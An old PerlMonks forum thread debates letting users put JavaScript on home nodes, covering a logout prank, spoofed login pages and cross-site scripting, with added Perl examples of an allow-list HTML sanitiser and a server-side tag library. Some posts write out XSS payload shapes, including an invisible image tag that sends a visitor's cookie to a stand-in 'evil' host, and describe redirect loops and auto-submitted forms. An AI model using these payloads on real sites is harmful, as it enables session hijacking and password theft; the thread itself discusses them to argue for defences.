As of this writing (2000/11/06), our beloved mt2k has a bit of JavaScript that logs people off PM when the user visits his homenode.
While annoying, it's basically harmless. It does, however, reveal a potential security risk. How many of you that have been trapped into visiting the esteemed mt2k's homenode immediately type in your account name and password to log back in, and continue on?
Did you bother to check that you were *really* at www.perlmonks.org, and not at a spoofed login page? Are you sure mt2k hasn't been snagging your password, so he can steal your XP, and sell it on eBay (mostly so he can finally afford a real webhosting service...)?
I'm pretty guilty about running around with JavaScript enabled myself, and I too have been bitten by the mt2k prank. For some reason, I did double check where I wound up, and found it was in a safe place, and not the "mt2k password stealing page".
While I personally would rather not see JavaScript banned from the HTML we can enter ( ar0n used to have some cool stuff on his homenode in JS), this kind of script, and the security risk is the exact sort of thing that I should imagine would cause it to get yanked.
And Dog help the soul that tries to spoof a password page around here, because the retaliation isn't just going to be getting /msg'ed to death, spammed, and nuked, it's going to be reporting you to the IRS (if you're American), Interpol for drug trafficking, the UN for war crimes, and listing you on mt2k's AOL buddy list.
--Chris
e-mail jcwren
RE: On JavaScript, mt2k, and security risks
by Fastolfe (Vicar) on Nov 07, 2000 at 01:57 UTC
It's not spoofing we have to worry about. With JavaScript enabled for us, this site is basically *allowing* the "cross-site scripting" vulnerabilities we see reported to BugTraq when people are permitted to execute JavaScript via, say, Hotmail.
In short, all someone has to do is use JavaScript's cookie code to fetch your PerlMonks cookie and deliver it to the malicious user. You don't even have to click a button. Put the JavaScript in an <img src="javascript:do_evil()"> tag, or any of the other dozens of ways of invoking JavaScript, which will neatly circumvent most regexp means of preventing it. The browser has to assume that all code and content coming from a web site is "sanctioned" and approved by that web site, so anything that comes in and tries to muck with the site's cookies or whatever has to be considered legitimately from that site, which means it'll be permitted.
The bottom line: Allowing anybody to put their own content on your web site (such as message boards or sites like this) is a bad idea unless you severely limit what they're allowed to put up. This includes all scripting languages and quite a lot of HTML tags and attributes. As much as I'd hate to see JavaScript go, it's simply not possible to write a secure "parser" that will remove evil JavaScript and permit what's left.
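The allow-list approach this post argues for, restricting what may go in rather than trying to recognise what is evil, as an added Perl example (not PerlMonks' code): unknown tags, unknown attributes and any non-http URL are dropped, so the <img src="javascript:..."> variant above does not survive. The tag policy and the sample node text are constructed.

```perl
# Added example (not PerlMonks' code): allow-list filtering of user-supplied HTML.
# Keep only known tags/attributes and http(s) URLs instead of hunting for "evil" JS.
use strict;
use warnings;

# Constructed policy: tags a user may use and the attributes allowed on each.
my %ALLOWED = (
    p => [], b => [], i => [], code => [],
    a   => ['href'],
    img => ['src', 'alt', 'width', 'height'],
);
# Absolute http(s) URLs only; javascript:, data:, vbscript: and friends fail.
sub safe_url { my ($u) = @_; return $u =~ m{^https?://[^\s"'<>]+$}i }
sub escape_text {
    my ($t) = @_;
    $t =~ s/&/&amp;/g; $t =~ s/</&lt;/g; $t =~ s/>/&gt;/g; $t =~ s/"/&quot;/g;
    return $t;
}

# Rebuild one tag from the policy, dropping everything not explicitly allowed.
sub rebuild_tag {
    my ($close, $name, $attrs) = @_;
    $name = lc $name;
    return '' unless exists $ALLOWED{$name};   # unknown tag: removed entirely
    return "</$name>" if $close;
    my %ok  = map { $_ => 1 } @{ $ALLOWED{$name} };
    my $out = "<$name";
    while ($attrs =~ /\G\s*(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gc) {
        my ($k, $v) = (lc $1, defined $2 ? $2 : defined $3 ? $3 : $4);
        next unless $ok{$k};                   # onload=, style=, ... never pass
        next if ($k eq 'href' || $k eq 'src') && !safe_url($v);
        $out .= qq{ $k="} . escape_text($v) . '"';
    }
    return '' if $name eq 'img' && $out !~ / src=/;   # no safe src: drop image
    return "$out>";
}

# Every tag is rebuilt from the policy; a stray '<' becomes literal text.
sub sanitize_html {
    my ($html) = @_;
    $html =~ s{<(/?)([A-Za-z][\w-]*)([^>]*)>|<}
              { defined $2 ? rebuild_tag($1, $2, $3) : '&lt;' }ge;
    return $html;
}

# Constructed sample node text with the payload shapes discussed in the thread.
my $node = q{<p onmouseover="do_evil()">Hi</p><img src="javascript:do_evil()">}
         . q{<img src="http://example.org/pic.gif" width="0"><b>ok</b>};
print sanitize_html($node), "\n";
```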
RE: On JavaScript, mt2k, and security risks
by vroom (His Eminence) on Nov 07, 2000 at 02:21 UTC
I'm all for fun... but annoying other users isn't fun. Also, there are a lot of things that people can do with JavaScript. I wish I didn't have to make it disappear; however, it seems inevitable. The more e-mails and /msg's I get from people about the potential dangers of using JavaScript, the more I realize that it's going to have to disappear from the site entirely on home nodes, as there is no good way of filtering what is good JS and what is bad JS.
I'd like to thank all of you who wear the white hats and let me know about potential problems; sadly, it's inevitable that not all people will wear the white hat.
vroom | Tim Vroom | vroom@cs.hope.edu
Sad, sad day.
Well, silver lining time: Let's add a new toy to replace the old JS one! Here is what I am thinking: PM-code already scans through a node looking for [ and ] and <code> tags and such. Why not start a library of user-defined PM tags? These tags would call a predefined function that does something. (This is like a specialized server-side include, which is not the same as the client-side JavaScript.) This library would be under the direct control of either Vroom or a few high-level monks. (Either another clan or just the saints or something.) Anyway, the idea being that when you come up with something cute you would like to have on your node, you submit it to the maintainer of the library, who then tells you the tag to use (or not, if the idea is rejected). Other users can then incorporate these new ideas as they choose by using the same tags. And of course, a few data points will be made available to this library (visitor's name, level, and maybe XP, for example).
So, an example:
sub SetRandomBGColor
{
    # pick one colour at random; the array in numeric context gives its size
    my @colorset = qw( aqua white yellow lime );
    my $color = $colorset[int rand @colorset];
    # emitted into the rendered node, where it restyles the page body
    print "<style><!-- body { background-color:$color;} --></style>";
}
# This could then be used to do something like:
#
# <PM SetRandomBGColor>
#
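The server-side tag library sketched above, as an added Perl example (not the site's code): a fixed registry of approved functions, the <PM Name> expansion, and the visitor data points the post mentions. The Greet function, the visitor record and the sample node text are constructed.

```perl
# Added example (not PerlMonks' code): a server-side "PM tag" library of the kind
# proposed above. Only names registered here run, with no arguments, so a node
# author picks from approved effects instead of shipping code to other visitors.
use strict;
use warnings;

sub escape_html {
    my ($t) = @_;
    $t =~ s/&/&amp;/g; $t =~ s/</&lt;/g; $t =~ s/>/&gt;/g;
    return $t;
}

# Approved tag functions. Each receives the visitor record the site supplies
# (name, level, xp) and returns the HTML fragment spliced into the node.
sub SetRandomBGColor {
    my @colorset = qw( aqua white yellow lime );
    my $color = $colorset[int rand @colorset];
    return "<style><!-- body { background-color:$color;} --></style>";
}

sub Greet {
    my ($visitor) = @_;
    # The name comes from the server's session, not the node author, but is
    # escaped anyway before it lands in a page someone else controls.
    return 'Hi, ' . escape_html($visitor->{name}) . "! (level $visitor->{level})";
}

# The registry is the whole attack surface: maintainers add entries here,
# node authors can only name them.
my %PM_TAGS = (
    SetRandomBGColor => \&SetRandomBGColor,
    Greet            => \&Greet,
);

# Replace every <PM Name> in the node text with that function's output.
# An unregistered name is removed rather than passed through to the browser.
sub expand_pm_tags {
    my ($node_text, $visitor) = @_;
    $node_text =~ s{<PM\s+(\w+)\s*>}{ $PM_TAGS{$1} ? $PM_TAGS{$1}->($visitor) : '' }ge;
    return $node_text;
}

# Constructed sample: a node's text and the visitor's session record.
my %visitor = (name => 'mdillon', level => 7, xp => 1234);
my $node    = "<PM SetRandomBGColor>\n<p><PM Greet></p>\n<PM DropTables>";
print expand_pm_tags($node, \%visitor), "\n";
```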
RE: On JavaScript, mt2k, and security risks
by Adam (Vicar) on Nov 07, 2000 at 02:09 UTC
There are plenty of evil things that users could do, with or without javascript. They don't happen here because we are a friendly community. (I hope). As things currently stand it is rather simple for a user to read (and log) the cookie of every visitor to their homenode. This gives them a bunch of passwords (encrypted) and all the time in the world to run crack on them. You could also cause a person to spend all their votes on your favorite (or least favorite) nodes. Or cause a person to say something stupid in the chatterbox. Etc. But these things are all somewhat limited... how? Community.
Personally, I do not wish to see JavaScript removed from homenodes. I want to see people who abuse the privilege banned from the site. I think you should need level 2 or 3 or higher before you can put anything other than <p> on your home node. Ok, maybe they should just be limited to Perl Monks Approved HTML tags. But still, once a person has established themselves as a member of the community, their home node should be a place of expression. They should be allowed to do almost anything there (within reason... as defined as non-malicious).
(Ovid) RE: On JavaScript, mt2k, and security risks
by Ovid (Cardinal) on Nov 07, 2000 at 01:59 UTC
Okay, now I have a serious problem with JavaScript. I used to think that it was totally innocuous, but consider the following:
- Some new user posts a javascript that kicks you to another node.
- Some new user posts a javascript on the other node that kicks you back to the first one.
As much as I hate to admit it, I'm beginning to think that we should reconsider javascript.
Of course, someone could do the same thing with a refresh <meta> tag. Those aren't allowed any more, are they?
Cheers,
Ovid
Join the Perlmonks Setiathome Group or just go to the link and check out our stats.
I've done an automatic PM surfer, that automatically surfs the PM site.
It is good for me, and I need to have it on my home node because of JS security issues
(one isn't allowed to read contents from windows loaded from other sites, which is good).
I usually log out before I use it, surfing around as AnonMonk.
However, if someone uses automatic JS stunts to do bad stuff to others, I believe in removing the user, not their tool.
/brother t0mas
RE: On JavaScript, mt2k, and security risks
by mdillon (Priest) on Nov 07, 2000 at 02:48 UTC
the real JavaScript baddie is crazyinsomniac. he actually does read your PerlMonks cookie (at least he strips the password and uses only the username). currently, all that is done with it is to display the user's name on the page (something like "Hi! mdillon!") and add an "invisible" IMG to the page that is called with the monk's name as a URL param, but it would be trivial for another user with less scruples to copy crazyinsomniac's code and use it to grab an invisible image with the whole cookie as the URL param:
<img width="0" height="0" src="http://i.am/evil/0.gif?cookie=mdillon%05asdf08f98as">
just b.t.w., when did you change your password last? :-))
Have a nice day
All decision is left to your taste
RE: On JavaScript, mt2k, and security risks
by extremely (Priest) on Nov 07, 2000 at 06:31 UTC
RE: On JavaScript, mt2k, and security risks
by jptxs (Curate) on Nov 07, 2000 at 02:11 UTC
Just a small note. I don't know about anyone else, but mt2k's node does bounce me to the login page, but does not log me out...
"sometimes when you make a request for the head you don't
want the big, fat body...don't you go snickering."
-- Nathan Torkington UoP2K a.k.a gnat
The only thing JavaScripty about the node is that it automatically submits a form.
I could write my own form, with a hidden node_id field and a carefully prepared chatterbox message, and do the same thing. Without JavaScript, it's not even as malicious as assuming all vroom's godly powers.
RE: On JavaScript, mt2k, and security risks
by c-era (Curate) on Nov 07, 2000 at 20:26 UTC
Maybe we can let javascript be like images with an extra step. First, the user must be level 5 or above. Second, the user must upload the javascript (a .js file). Third, some group of people (like we have for the Q&A) view the javascript and ok it. Finally, the javascript is embedded in the home node when the page is rendered. Since the javascript is stored on the server side, the javascript can't be changed by the user without submitting the javascript again.
RE: On JavaScript, mt2k, and security risks
by agoth (Chaplain) on Nov 08, 2000 at 18:58 UTC
Hmmm,
I didn't mind mt2k's bounce particularly, but I do object to being logged out on j.a.p.h.'s home node, even though the timeout makes it less of a sudden blast of white.
Forced redirection is not one of my favourite things.